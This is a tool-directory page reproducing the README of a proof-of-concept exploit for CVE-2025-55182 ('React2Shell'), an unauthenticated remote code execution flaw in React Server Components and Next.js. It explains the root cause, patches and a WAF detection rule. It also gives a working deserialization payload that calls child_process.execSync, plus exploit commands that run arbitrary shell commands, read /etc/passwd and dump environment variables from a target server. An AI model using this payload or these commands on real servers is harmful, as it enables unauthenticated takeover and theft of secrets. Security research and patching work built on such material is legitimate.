Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — CVE-2025-55182 (React2Shell) の概念実証エクスプロイト。Flight プロトコルのデシリアライゼーションを介して React Server Components における未認証のリモートコード実行を示します。脆弱なサーバーセットアップと検出スクリプトを含みます。 | Kitploit
ツール/GitHubGitHub/greenheadhq/cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubgreenheadhq/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 (React2Shell) の概念実証エクスプロイト。Flight プロトコルのデシリアライゼーションを介して React Server Components における未認証のリモートコード実行を示します。脆弱なサーバーセットアップと検出スクリプトを含みます。

リポジトリを見る
1139ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 (React2Shell) PoC 環境

警告: このプロジェクトは セキュリティ研究および教育目的 でのみ使用してください。 許可なく他人のシステムに使用することは違法です。

脆弱性概要

項目内容
CVE IDCVE-2025-55182
別名React2Shell
CVSSスコア10.0 (Critical - 最大深刻度)
脆弱性タイプUnauthenticated Remote Code Execution (RCE)
発見者Lachlan Davidson
公開日2025年12月3日

影響を受けるバージョン

React パッケージ

  • react-server-dom-webpack: 19.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0, 19.1.0, 19.1.1, 19.2.0

Next.js

  • 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

プロジェクト構造

root@kitploit:~
CVE-2025-55182/
├── README.md                    # 이 파일
├── vulnerable-server/           # 취약한 Next.js 서버
│   ├── package.json
│   ├── next.config.js
│   ├── tsconfig.json
│   └── app/
│       ├── layout.tsx
│       ├── page.tsx
│       └── actions.ts           # Server Action
├── exploit/                     # 공격 PoC
│   ├── package.json
│   ├── poc.js                   # RCE 공격 스크립트
│   └── check-vulnerability.js   # 취약점 체크 스크립트
└── React2Shell-CVE-2025-55182-original-poc/  # 원본 PoC 참조

クイックスタート

1. 脆弱なサーバのセットアップと実行

root@kitploit:~
# 의존성 설치
cd vulnerable-server
npm install

# 개발 모드로 서버 실행 (포트 3000)
npm run dev

サーバが http://localhost:3000 で実行されます。

2. 攻撃PoCの実行

新しいターミナルで:

root@kitploit:~
# 의존성 설치
cd exploit
npm install

# 취약점 체크
npm run check

# PoC 실행 (테스트 모드)
npm run exploit

攻撃PoCの使い方

基本テスト (console.log)

root@kitploit:~
node poc.js -m test

電卓の実行 (RCE証明の定番)

root@kitploit:~
# macOS
node poc.js -m calc

# Linux
node poc.js -m calc -c linux

# Windows
node poc.js -m calc -c windows

システムコマンドの実行 (RCE)

root@kitploit:~
# id 명령 실행
node poc.js -t http://localhost:3000 -m rce -c "id"

# 파일 읽기
node poc.js -t http://localhost:3000 -m rce -c "cat /etc/passwd"

# 시스템 정보
node poc.js -t http://localhost:3000 -m rce -c "uname -a"

環境変数の奪取

root@kitploit:~
node poc.js -t http://localhost:3000 -m env

カスタムコードの実行

root@kitploit:~
node poc.js -m custom -c "require('fs').readFileSync('/etc/passwd').toString()"

技術的分析

脆弱性の根本原因

React Server ComponentsのFlightプロトコルにおいて、クライアントが送信したデータを逆シリアル化する際に発生します。

root@kitploit:~
requireModule関数がクライアントが送信したプロパティ名を検証なしで信頼
→ moduleExports[metadata[NAME]]実行時にhasOwnPropertyチェックなし
→ プロトタイプチェーン操作可能 (Server-Side Prototype Pollution)
→ Functionコンストラクタ取得 → RCE

攻撃チェーン

  1. $@x 逆シリアル化トリガー - Chunkオブジェクト参照取得
  2. Promiseチェイニング悪用 - .thenメソッドを持つthenableオブジェクト注入
  3. 偽のChunkオブジェクトでパーサー再入 - status: resolved_model設定
  4. ガジェットチェイン構成 - _response, _formDataなど活用
  5. Functionコンストラクタ取得 - $1:constructor:constructor
  6. 任意コード実行 - new Function(악성코드)実行

ペイロード構造

root@kitploit:~
{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': 'process.mainModule.require("child_process").execSync("id")//',
        '_formData': {
            'get': '$3:constructor:constructor'
        },
        '_chunks': '$2:_response:_chunks'
    }
}

パッチ方法

Next.js アップグレード

root@kitploit:~
# 15.0.x 사용자
npm install [email protected]

# 15.1.x 사용자
npm install [email protected]

# 15.2.x 사용자
npm install [email protected]

React パッケージ アップグレード

root@kitploit:~
npm install [email protected]
npm install [email protected]
npm install [email protected]

検出方法

HTTPリクエストの特徴

  • POSTリクエスト
  • Next-Actionヘッダー存在
  • multipart/form-data形式
  • 本文に$@, resolved_model, constructorなどのパターン

WAFルール例

root@kitploit:~
# 의심스러운 Flight 페이로드 탐지
SecRule REQUEST_HEADERS:Next-Action "@rx ." \
    "id:1001,phase:2,deny,status:403,\
    chain"
SecRule REQUEST_BODY "@rx constructor.*constructor" \
    "t:lowercase"

参考資料

  • React公式ブログ
  • 元のPoC (Lachlan Davidson)
  • Datadog Security Labs分析
  • Wiz分析

ライセンス

このプロジェクトは 教育および研究目的 でのみ提供されます。 悪意のある目的での使用は禁止します。


注意: 実環境でこの脆弱性を発見した場合は、直ちにパッチを適用してください。 攻撃が確認された場合は、セキュリティチームに報告し、侵害調査を実施してください。

ツールをダウンロード